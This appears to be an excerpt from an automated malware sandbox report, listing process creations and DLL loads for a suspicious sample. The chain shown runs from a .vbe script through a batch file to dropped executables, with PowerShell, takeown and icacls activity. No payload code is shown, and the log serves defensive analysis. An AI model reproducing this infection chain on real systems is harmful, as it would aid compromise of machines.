                                  Source: C:\Windows\Tasks\1.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe"
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\fwJLoWFGhpY.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Bridgeprovider.exe "C:\Windows/Bridgeprovider.exe"
                                  Source: C:\Windows\Bridgeprovider.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline"
                                  Source: C:\Windows\Bridgeprovider.exeProcess created: unknown unknown
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\takeown.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\takeown.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: version.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: dxgidebug.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: sfc_os.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: sspicli.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: rsaenh.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: uxtheme.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: dwmapi.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: cryptbase.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: riched20.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: usp10.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: msls31.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: dpapi.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: windowscodecs.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: textshaping.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: textinputframework.dll
